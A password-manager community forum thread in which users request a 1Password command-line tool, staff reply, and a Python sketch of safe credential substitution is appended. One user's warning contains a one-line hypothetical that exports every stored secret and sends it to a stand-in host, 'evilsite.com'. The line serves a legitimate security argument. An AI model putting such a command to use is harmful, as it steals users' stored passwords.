Command line utility


Comments

  • oggy
    Community Member

    I wrote my own command line reader here: https://github.com/oggy/1pass . Standard disclaimers apply.

  • oggy
    Community Member

    I wrote a command line reader here: https://github.com/oggy/1pass . Doesn't support writing because I didn't want to screw up my keychain, but I'd take patches if someone out there is adventurous enough.

  • khad
    1Password Alumni

    Thanks for posting this, oggy! For those playing the home version of "Apps that Access 1Password Data Files", please be sure to read our recent blog post:

    You have secrets; we don’t. Why our data format is public

    The short version is that while we have to advise folks to never enter their 1Password Master Password into anything that isn’t 1Password, we have intentionally made our data format publicly available which means that such apps are inevitable. While we can’t endorse third-party apps, and indeed we have to advise against using them; their existence is still a Good Thing. They are proof that our openness about our data formats means that folks do not have to fear data lock-in. :)

  • general_axe
    Community Member

    Hi all,

    I'd like to add my vote to this request as well please (unless it's already been fulfilled?) ... I would find this functionality immensely useful, as I am in Terminal the whole time ... managing remote servers with complex (1Password generated) passwords.

    Cheers, Spencer

  • khad
    1Password Alumni

    Thanks, Spencer! I'll pass your vote along to the developers.

  • leesweet
    Community Member

    Do more votes help? Add me to the list..

  • khad
    1Password Alumni

    Thanks for letting us know you are interested as well! We really appreciate the feedback. Please keep it coming. :)

  • georgebrock
    Community Member

    I've built an unofficial read-only command line interface for 1Password. It's a Python package, so you can install it by running pip install 1pass at the command line.

    There's more information here: https://pypi.python.org/pypi/1pass

    The source code is here: https://github.com/georgebrock/1pass

    This isn't officially sanctioned by AgileBits and like most free, open source software is provided without warranty, but it's working well for me and various friends and colleagues.

  • khad
    1Password Alumni

    Thank you for producing and posting this, @georgebrock. :)

    I feel it prudent to include our "standard disclaimer" here. From our "You have secrets; we don’t. Why our data format is public" blog post:

    Third party apps and 1Password data

    Let me jump to what has prompted this article before returning to the virtues of publicly detailing our data format. Recently there’s been progress on third party tools and applications that can read 1Password data, and there are some important factors to consider about these tools:

    • Third party tools for reading 1Password data do not reflect a “break” in 1Password. They, like 1Password, require your Master Password in order to read your data.
    • We have to advise you to never enter your 1Password Master Password into anything that isn’t 1Password. We aren’t casting aspersions on the integrity or competence of any developers, but we simply can’t advise otherwise.
    • Third party tools are “third party”. Although we may sometimes help them understand the details of our data format, they are entirely independent of AgileBits. The fact that we may maintain a good relationship with them is not an endorsement of what they produce.
    • Third party tools exemplify the fact that there is no data lock in with 1Password.

    The existence of third party tools for reading 1Password data has had people ask about the security implications of us being so open about our data format. Our openness is a good thing, and here’s why.

  • anotheral
    Community Member

    Bump. This would be super-useful functionality for me, a *nix systems administrator. Something where I could embed a 1pass reply into a shell script would be amazing - a real-world example might be ipmitool, which takes a password on the command-line:

    ipmitool -U $(1p --print --user --account='foo-ipmi') -P $(1p --print --password --account='foo-ipmi') sol activate

    If I could do stuff like this, you'd be able to count me as a rabid evangelist for use of 1password in technical and even automated deployment settings.

  • adamehirsch
    Community Member
    edited August 2013

    I know this is probably a utility that would only be used by we neckbeards who like command line interfaces, but man, I would use an official Agile CLI interface many, many times a day. Consider this another vote. (Also, hi, Kevin!)

  • khad
    1Password Alumni

    I will definitely pass your votes along. Thanks for the additional feedback!

  • I'll add another (strong) request for a command line util.

  • khad
    1Password Alumni

    Thanks, @jstrater!

  • bradleymccrorey
    Community Member

    This is the only barrier to my registering 1password

  • khad
    1Password Alumni

    I'll make sure the developers know this. Thanks for your feedback, @bradleymccrorey! :)

  • owntheweb
    Community Member

    Hello password masters,

    After setting up a new web server with a whole list of starting SSH access, FTP info, db info, etc., having some kind of terminal shortcuts would be awesome.

    1-up! :D

  • Thanks for getting in touch with us, @owntheweb :) It is a great suggestion that our developers have been looking at, it is just tricky to make sure we can do this in a secure manner.

    In 1Password 4 for Mac, we've made it easier to access your information from within 1PasswordMini, which will be in the main toolbar. It is not 100% what you are looking for, but it is a step in the right direction :)

  • evantill
    Community Member

    1PasswordMini is great but is definitively not the solution

    what about action script

    A simple use case is using ssh to connect to a host (without certificate)
    1Password can act like openssh and ask the first time with a modal dialog box to allow access to password XXX

  • Megan
    1Password Alumni

    Hi @evantill,

    Thanks for the feedback! As mentioned, our developers are looking into solutions here, and I'll be sure to pass along your idea :)

  • Uno_Lavoz
    Community Member
    edited October 2013

    Why aren't any of the commenters seeing the main issue with this?

    • You're asking that it be possible to access 1Password via the command line, without asking for the password (as long as 1Password is unlocked at the time).

    Am I really the only one that sees the issue here?

    Anyone?

    I'll give you a hint:

    Evilapp.sh: 1p --export '*' > /tmp/evil.txt; send evil.txt to evilsite.com

    The same power given to your scripts would be given to all evil programs on your computer.

    Consider this a -INFINITY negative vote from me to never add this feature.

    Stick to the various command line tools that others have written above.

    Unless it can be done securely somehow, it has no place in the official 1Password.

  • Megan
    1Password Alumni

    Hi @Uno_Lavoz,

    Thanks for your feedback here - as Sara mentioned above, our developers are committed to finding a secure way to do this, if we do it at all. We certainly don't want any loopholes that might allow access for Evilapp :)

  • Uno_Lavoz
    Community Member
    edited October 2013

    @Megan

    I don't think there is a secure way to do it. Doing it securely would mean having some sort of per-app-instance session-limited-permissions, but even that falls apart quickly:

    • You could find the process-ID (PID) of the calling process, such as an instance of Terminal.app running a script that uses it, or similar.
    • Then you check if that PID has been allowed during the current computing session. If not, pop up an Allow/Deny permission dialog (and a password prompt if 1P is locked at the moment).
    • If they allow the action, it adds that PID to a list of allowed processes for the current compute session.

    The problem then becomes that there's no way to distinguish Terminal.app with PID 12974 (allowed) from running good.sh or evil.sh. So after you've done your benign work, maybe some evil script will tag along and do its evil deeds by piggybacking off an allowed PID.

    The only way around that would be to just point-blank pop up an Allow/Deny dialog on EVERY call to 1P's command-line binary. This would quickly get out of hand if a script requires 4-5 calls. But it's the only truly safe way: Ask people to verify EVERY action (and always show the source app that requested permission, along with the command line parameters provided).

  • sjk
    1Password Alumni

    Thanks for the additional followup, @Uno_Lavoz.

    We're aware of all these things which is a big part of the reason we haven't moved forward yet. But we never say never. Who knows what the future may bring? :)

  • georgebrock
    Community Member

    Something I'm considering adding to 1pass is an option to have it run a command for you, substituting tokens like %u and %p for your login information. @anotheral gave this example:

    ipmitool -U $(1p --print --user --account='foo-ipmi') -P $(1p --print --password --account='foo-ipmi') sol activate
    

    I'm imagining an interface that looks more like this:

    1pass --execute "ipmitool -U %u -P %p sol activate" foo-ipmi
    

    1pass would prompt you for your master password, find the foo-ipmi login, fill in the username and password in the command, and run the complete command for you. It's secure, in so far as you have to type your master password each time you want to access data from your keychain, and it's convenient, because you don't have to invoke it multiple times to build a single command (which seems to be the reason people are requesting a CLI that doesn't require a password each time).

    I'm not looking for official sanction for 1pass here (@khad's caveat completely applies: 1pass isn't official, and you should definitely think carefully before typing your master password into anything that isn't the official app), but I mention this because I wonder if this is the kind of interface that the 1Password team would consider sufficiently secure for an official CLI?
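
The `--execute` interface proposed in the post above, sketched as an added example (not code from 1pass or from 1Password): the template is split into arguments before `%u` and `%p` are filled in, and the command runs without a shell, so a password containing spaces or shell metacharacters stays a single argument. `build_argv`, `execute` and the sample credentials are hypothetical; the keychain lookup and master-password prompt are left out.

```python
import shlex
import subprocess


def build_argv(template, username, password):
    """Split the command template into arguments, then fill in %u / %p.

    Splitting happens before substitution, so nothing inside the secret
    can add, remove or re-quote arguments. Each argument is scanned once,
    so a '%u' that occurs inside the password is not expanded again.
    '%%' yields a literal percent sign.
    """
    fields = {"u": username, "p": password, "%": "%"}
    argv = []
    for arg in shlex.split(template):
        out, i = [], 0
        while i < len(arg):
            if arg[i] == "%":
                if i + 1 >= len(arg) or arg[i + 1] not in fields:
                    # Report only the template text, never the secrets.
                    raise ValueError(f"unknown token in argument {arg!r}")
                out.append(fields[arg[i + 1]])
                i += 2
            else:
                out.append(arg[i])
                i += 1
        argv.append("".join(out))
    return argv


def execute(template, username, password):
    """Run the filled-in command directly, with no shell in between."""
    argv = build_argv(template, username, password)
    return subprocess.run(argv, check=False).returncode


if __name__ == "__main__":
    # Constructed sample credentials; a real tool would read them from
    # the unlocked keychain entry named on the command line.
    user, secret = "admin", "pa ss; $(id) %u"
    for element in build_argv("ipmitool -U %u -P %p sol activate", user, secret):
        print(repr(element))
```

The filled-in password is still an argument of the child process, so it is visible in the process list while the command runs; ipmitool's `-E` (password from the `IPMI_PASSWORD` environment variable) and `-f` (password file) options avoid that.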

This discussion has been closed.